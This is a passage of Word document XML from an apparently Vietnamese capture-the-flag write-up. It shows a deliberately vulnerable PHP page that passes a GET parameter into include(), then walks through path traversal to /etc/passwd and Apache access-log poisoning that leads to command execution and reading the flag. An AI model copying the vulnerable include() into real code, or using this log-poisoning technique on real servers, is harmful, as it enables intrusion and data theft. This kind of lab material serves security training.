            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>// error_reporting(0);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="767FAD93" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> (!isset($_GET[</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'game'</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B32D392" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        header(</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'Location: /?game=fatty-bird-1.html'</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07EB4290" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67653C77" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    $game = $_GET[</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'game'</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CD9D3D" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3815F83D" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DE11626" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F1B8F69" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>&lt;html lang="en"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F59A6A7" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    &lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D5B4A16" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'./views/header.html'</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0235D350" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    &lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F842B5" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0023FEC4" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    &lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF1439F" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        &lt;br&gt;&lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65BC2139" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        &lt;p class="display-5 text-center"&gt;Goal: RCE me&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D5376AC" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="05FCA511" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485524F6" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        &lt;div style="background-color: white; padding: 20px;"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0577DC85" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'./views/'</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> . $game; </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6253840D" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38FDC73B" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7AD0FA79" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    &lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E25DE35" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4DCA609C" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>&lt;?php</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'./views/footer.html'</w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00586CD4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E913D7" w14:textId="77777777" w:rsidR="00586CD4" w:rsidRPr="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00586CD4">
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="43D348B9" w14:textId="0CB3965F" w:rsidR="00117F3A" w:rsidRDefault="00117F3A" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00117F3A">
        <w:t>Ở Level 5, ứng dụng vẫn duy trì đoạn mã xử lý liên quan đến chức năng trò chơi tương tự như các level trước, tuy nhiên không bổ sung thêm bất kỳ chức năng nào khác. Vì vậy, phương pháp khai thác LFI thông qua việc upload file chứa mã PHP như ở các level trước không còn khả thi trong trường hợp này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C8F491" w14:textId="77777777" w:rsidR="00DA6D83" w:rsidRDefault="00DA6D83" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF619D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">* Ý tưởng </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CBF988" w14:textId="4985EF76" w:rsidR="00F14263" w:rsidRPr="00F14263" w:rsidRDefault="00F14263" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F14263">
        <w:t xml:space="preserve">Một số trang web thường có cơ chế ghi log để lưu lại hoạt động của người dùng, và đây có thể trở thành điểm yếu để khai thác. Bằng cách cố tình tạo ra các bản ghi log có chứa mã PHP, ta có thể lợi dụng lỗ hổng Path Traversal để ép ứng dụng sử dụng hàm include() đọc file log đó, từ đó thực thi mã độc từ </w:t>
      </w:r>
      <w:r>
        <w:t>xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABB6AE" w14:textId="77777777" w:rsidR="00DA6D83" w:rsidRPr="00184ED1" w:rsidRDefault="00DA6D83" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E48E057" w14:textId="350F4EF3" w:rsidR="004F4982" w:rsidRPr="004F4982" w:rsidRDefault="004F4982" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="004F4982">
        <w:t xml:space="preserve">Trước tiên, mình sẽ thử đưa đường dẫn của file /etc/passwd vào tham số game để kiểm tra </w:t>
      </w:r>
      <w:r>
        <w:t>chắc chắn rằng</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4982">
        <w:t xml:space="preserve"> ứng dụng có </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">thực thi hàm include() để đọc file </w:t>
      </w:r>
      <w:r w:rsidR="00B44CBA">
        <w:t>không. Và kết quả là thông tin trong /etc/passwd đã được hiển thị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F63B68F" w14:textId="071ECE0C" w:rsidR="00586CD4" w:rsidRDefault="00586CD4" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00586CD4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FEC36C9" wp14:editId="7CD8DAAE">
            <wp:extent cx="5731510" cy="1179830"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1527134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4783" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1179830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B264B6" w14:textId="116FD757" w:rsidR="00B44CBA" w:rsidRDefault="008C1D41" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="008C1D41">
        <w:t xml:space="preserve">Tiếp theo, để có thể thực hiện khai thác LFI, mình sẽ tiến hành tìm kiếm thông tin về đường dẫn lưu trữ các file log của web server. Các file log — đặc biệt là file truy cập (access.log) hoặc file lỗi (error.log) — thường ghi lại dữ liệu từ các yêu cầu HTTP, bao gồm cả tiêu đề như User-Agent hay Referer. Nếu có thể kiểm soát nội dung ghi vào log, mình hoàn toàn có thể chèn mã PHP vào đó và sau đó sử dụng lỗ hổng Path Traversal để ép ứng dụng include() file log, từ đó thực thi mã độc từ </w:t>
      </w:r>
      <w:r>
        <w:t>xa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3A172" w14:textId="10F15045" w:rsidR="001840D4" w:rsidRDefault="001840D4" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001840D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A11C1E" wp14:editId="3C0A5324">
            <wp:extent cx="5731510" cy="1873250"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1595659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59083" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1873250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CF25D" w14:textId="77777777" w:rsidR="00AA78D9" w:rsidRPr="00AA78D9" w:rsidRDefault="00AA78D9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA78D9">
        <w:t>Dựa trên thông tin thu thập được, mình đã xác định được vị trí lưu trữ log của web server và truy cập thành công vào file /var/log/apache2/access.log. Trong nội dung log, có thể quan sát được các thông tin chi tiết về các yêu cầu HTTP gửi đến server, bao gồm địa chỉ IP, thời gian truy cập, phương thức HTTP, đường dẫn URL, mã phản hồi và chuỗi User-Agent. Đáng chú ý, trong một số dòng log, đường dẫn URL có chứa chuỗi /etc/passwd — chính là payload mà mình đã gửi trước đó để kiểm tra lỗ hổng LFI. Điều này xác nhận rằng nội dung yêu cầu đã được ghi lại đầy đủ trong log và có thể được sử dụng để thực hiện kỹ thuật Log Poisoning, nhằm chèn mã PHP vào log và khai thác thực thi từ xa thông qua hàm include().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A149C4" w14:textId="77777777" w:rsidR="001840D4" w:rsidRDefault="001840D4" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7450BBE9" w14:textId="3E99B7F9" w:rsidR="001840D4" w:rsidRDefault="001B67AD" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001B67AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A33AB24" wp14:editId="356CF103">
            <wp:extent cx="5731510" cy="946785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="1190732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32977" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="946785"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB5066C" w14:textId="034F4EC0" w:rsidR="00AA78D9" w:rsidRDefault="00AA78D9" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00127EDF" w:rsidRPr="00127EDF">
        <w:t xml:space="preserve">chèn đoạn mã PHP vào một phần của </w:t>
      </w:r>
      <w:r w:rsidR="00127EDF">
        <w:t>request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C0BB4" w14:textId="650D8B0C" w:rsidR="001B67AD" w:rsidRDefault="001B67AD" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001B67AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="539C3036" wp14:editId="58B570EE">
            <wp:extent cx="5731510" cy="1221105"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18678334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33467" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1221105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B411B5C" w14:textId="26DF0DCC" w:rsidR="00127EDF" w:rsidRDefault="00127EDF" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00127EDF">
        <w:t>ết quả là trang web hiển thị thông tin cấu hình chi tiết của PHP thông qua hàm phpinfo()</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB425C7" w14:textId="6ED688DD" w:rsidR="001B67AD" w:rsidRDefault="001B67AD" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001B67AD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374D7F25" wp14:editId="35106E39">
            <wp:extent cx="5731510" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1544316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16191" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1242060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF7752" w14:textId="636795D6" w:rsidR="00127EDF" w:rsidRPr="00127EDF" w:rsidRDefault="006C2EA0" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Thay đổi hàm phpinfo() bằng hàm system() chứa lệnh command bên trong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C1817" w14:textId="30D958AD" w:rsidR="00D61149" w:rsidRDefault="00D61149" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D61149">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2BA630" wp14:editId="29F634ED">
            <wp:extent cx="5731510" cy="1140460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="4356122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2289" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1140460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB347DD" w14:textId="6153BC92" w:rsidR="006C2EA0" w:rsidRPr="006C2EA0" w:rsidRDefault="006C2EA0" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lệnh đã được thực thi thành công và trả về kết quả là </w:t>
      </w:r>
      <w:r w:rsidR="002D75E5">
        <w:t>tên file flag trong file log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF8A939" w14:textId="59489C6C" w:rsidR="00D61149" w:rsidRDefault="00D61149" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D61149">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51A5C2A2" wp14:editId="04AC0310">
            <wp:extent cx="5731510" cy="2328545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="375125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25929" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2328545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1827CB4E" w14:textId="77777777" w:rsidR="002D75E5" w:rsidRDefault="002D75E5" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="631BA617" w14:textId="6C2B85F5" w:rsidR="002D75E5" w:rsidRPr="002D75E5" w:rsidRDefault="002D75E5" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Thực hiện đọc flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125326C9" w14:textId="6C015B6B" w:rsidR="00D61149" w:rsidRDefault="00D61149" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D61149">
        <w:rPr>
          <w:noProof/>
